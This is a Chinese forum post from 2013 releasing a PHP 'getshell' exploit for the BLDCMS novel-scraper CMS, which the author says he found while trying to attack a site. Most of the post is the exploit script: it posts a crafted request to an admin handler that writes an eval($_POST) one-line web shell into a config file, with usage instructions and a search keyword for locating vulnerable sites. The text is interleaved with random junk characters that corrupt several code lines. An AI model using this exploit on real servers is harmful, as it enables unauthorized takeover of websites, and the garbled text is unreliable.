之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞( ^( M) H; G3 O6 g/ _3 G U
4 b1 ?# O/ W( n! S- i7 f: B2 \. J
3 y5 f9 y+ x1 V& w话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
; {7 D/ V+ y3 d5 m& g
4 e* ?% ]- k" _2 E既然都有人发了 我就把我之前写好的EXP放出来吧& G* F& P# {: M$ x! t
! i, Z/ W/ \; Mview source print?01.php;">
* ]. v4 d! Q- c; t& q5 R% S* e3 u02.<!--?php5 a3 E2 Z7 R: {; e1 i. T( h' B, m. c
03.echo "-------------------------------------------------------------------
% d5 R. D9 U- V. c0 {7 G2 K( s04. % P9 T' d" Y! _; d0 m& ~
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
8 H2 x0 e. ]7 b+ j1 Q06.
* [, a5 j$ ~6 o5 t+ g07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
! I+ d- J/ K( A- O2 K. F$ N08. 6 P* a8 ]3 n" t" \+ L4 l8 U: h7 g+ O& Q
09.QQ:981009941\r\n 2013.3.21\r\n
; ]' x1 y, V7 a( @0 W! k5 R7 g10. ( D0 r; K# ?% C" O0 G
11.
( o& d' Z1 ~) D+ h3 K$ g6 k12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
' @1 r r7 P9 R7 X2 Q13. 0 J% q8 p+ G* q C0 y* R1 g# Y
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 r# p1 C# H9 j! J7 E5 r# p15. : d" }. } V5 ]
16.--------------------------------------------------------------------\r\n";
5 q9 F% _9 A0 @7 R- f+ ~0 V17.$url=$argv[1];
. {/ T4 m4 w% P0 \8 u18.$dir=$argv[2];
6 J4 @6 }/ x+ K) _19.$pass=$argv[3];
6 y* m5 n5 Q; {7 f20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
, G9 o& b) A9 R' ?3 l$ G21.if (emptyempty($pass)||emptyempty($url))* F& r; q2 U) Z2 s/ k
22.{exit("请输入参数");}/ a, w2 W0 C h9 u6 x- O1 P
23.else
2 h' H' L6 S l9 A h% q24.{
* o" M: a. w9 F- G Z( s3 a25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev5 H# }& l, V4 Q$ _0 P) U
26.
9 h l+ ^5 t3 `- `27.al;
) T4 w7 D. P4 H' s0 o" O( U28.$length = strlen($fuckdata);
* T6 z+ q* K9 p2 _29.function getshell($url,$pass)
- C+ W, E1 b, q* w$ m30.{# f( Q7 G" g8 b4 ^
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
# }* [- k2 m' t( R( K' D0 i32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
( u$ U8 }! a% w8 Q33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";9 u% B$ X: Z4 {7 ^% X7 L- F
34.$header .= "User-Agent: MSIE\r\n";
0 p6 c6 O1 e: Z1 m35.$header .= "Host:".$url."\r\n";: s- F0 _( l/ N: k1 L
36.$header .= "Content-Length: ".$length."\r\n";
' d6 `/ X2 F9 n37.$header .= "Connection: Close\r\n";
% [3 P4 D+ z+ N( h l9 t38.$header .="\r\n";
6 D7 `& A0 O7 S3 p/ w& ~ u39.$header .= $fuckdata."\r\n\r\n";
4 A+ z. t. g' Q' ]1 {40.$fp = fsockopen($url, 80,$errno,$errstr,15);! [) l2 j- V* k L( W3 \4 U6 n
41.if (!$fp)
7 t# c$ U" O3 A% d9 r+ i42.{
# W* C4 i3 |# q$ [9 V43.exit ("利用失败:请检查指定目标是否能正常打开");
& c3 R/ b1 ?: b7 E7 y( i44.}; h) O6 w/ W j' Q" R$ S$ s
45.else{ if (!fputs($fp,$header))
# `& C$ L8 o6 [3 H% k9 b8 e2 [! d# ?! z46.{exit ("利用失败");}
/ S# B2 X' }+ a+ i5 U- H2 D47.else
/ t6 A8 D& c0 P- R9 k0 a48.{2 t: |2 H6 `0 \) ~' F2 ]
49.$receive = '';
# s, Y2 b2 I& d50.while (!feof($fp)) {( F' \5 F" u# D& H t/ P
51.$receive .= @fgets($fp, 1000);
2 f5 Y5 x$ E- d- z6 O' V52.}4 G% ]8 g- C- ^/ T$ \. ?
53.@fclose($fp);% c: Y) i' _( L% ?* j! J2 ?5 H
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
: s8 N5 c4 c4 C3 J# s3 H55.
5 C. D: y- q8 B6 P ?56.GPC是否=off)";
; q& f& e9 s/ d+ @. `57.}}; Q; T6 F) F. m3 s" P K
58.}) O1 k: I. F) i p
59.}
( K8 _) t3 |6 x$ i+ T6 d- s) S60.getshell($url,$pass);
# |5 p% Q7 W4 a% c# h8 o61.?-->' h6 v: C8 s' {, T" ^( C. _3 S
2 o5 p+ L# u1 B9 }1 f- h
& D) c% Q. t G0 d+ I4 @; ~
1 V; B, p8 Q# X) V0 zby 数据流
9 u( p1 E1 F, [& Y+ H( k8 x |
发表于 2013-3-26 20:49:10
收藏
支持
反对